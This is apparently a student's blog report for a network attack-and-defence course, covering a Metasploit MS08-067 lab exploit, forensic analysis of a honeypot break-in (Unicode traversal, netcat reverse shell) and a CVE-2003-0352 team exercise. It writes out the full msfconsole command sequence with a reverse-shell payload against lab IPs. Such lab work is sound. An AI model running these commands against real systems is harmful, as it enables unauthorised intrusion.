20211909 2021-2022-2 《网络攻防实践》第六周作业

实验要求

(1)动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
(2)取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。

  • 攻击者使用了什么破解工具进行攻击
  • 攻击者如何使用这个破解工具进入并控制了系统
  • 攻击者获得系统访问权限后做了什么
  • 我们如何防止这样的攻击
  • 你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么

(3)团队对抗实践:windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

实验过程

动手实践Metasploit windows attacker

启动msf

msfconsole

使用ms08_067漏洞攻击模块

use exploit/windows/smb/ms08_067_netapi

设置打开反向连接的载荷

set PAYLOAD generic/shell_reverse_tcp

看一下需要设置哪些参数

show options

设置攻击的RHOST以及反向连接的监听ip LHOST。

set RHOST 192.168.235.129
set LHOST 172.27.109.235

设置TARGET为0会自动识别靶机系统,输入exploit进行攻击

set TARGET 0
exploit

这里不知道为啥wsl的kali打不进去

换成虚拟机kali再打一次成功

取证分析实践:解码一次成功的NT系统破解攻击

下载文件后用wireshark打开,通过观察数据包的流向可以知道213.116.251.162为攻击者,172.16.1.106为靶机,我们以这两个ip为条件筛选一下。

ip.addr==213.116.251.162 && ip.addr==172.16.1.106

这里面tcp的流量很多,先追踪tcp流看看

在111流中,可以看到攻击者已经可以远程操控靶机了,所以权限的获取应该在这之前,我们找找之前的流

这里的流量,这不就是Unicode漏洞攻击么,Unicode漏洞是攻击者可通过IE浏览器远程运行被攻击计算机的cmd.exe文件,从而使该计算机的文件暴露,且可随意执行和更改文件的漏洞。这里是利用sql的方式去触发Unicode漏洞

可以在后面的流中看到攻击者利用漏洞做了什么操作

后面的流换了一种方式,%c0%af = /是任意文件读取漏洞,不过执行的操作好像和前面差不多

看这个流程应该是利用sql注入、文件任意读取漏洞去执行cmd,通过nc反向回连获得shell。
后面就是把各种信息填入对应的txt中

接着就是一些提权操作了,比如说把自己的账户填进用户组中

这里可以看到访问者连接到6868端口并获得了权限

从这已经可以看出攻击者知道是蜜罐主机了

团队对抗实践:windows系统远程渗透攻击和分析

使用CVE-2003-0352漏洞攻击win2k。

微软修改dcerpc框架后形成自己的RPC框架来处理进程间的通信。微软的RPC框架在处理TCP/IP信息交换过程中存在的畸形消息时,未正确处理,导致缓冲区溢出漏洞;此漏洞影响使用RPC框架的DCOM接口,DCOM接口用来处理客户端机器发送给服务器的DCOM对象激活请求,如UNC路径。wireshark抓包分析也可以佐证,攻击机发送两个DCERPC包后便获得了靶机4444端口的访问权限和shell。

遇到的问题

在做第一个任务时wsl的kali无法打入,换成kali虚拟机即可解决。

posted @ 2022-04-18 21:05  PwnKi  阅读(154)  评论(0编辑  收藏  举报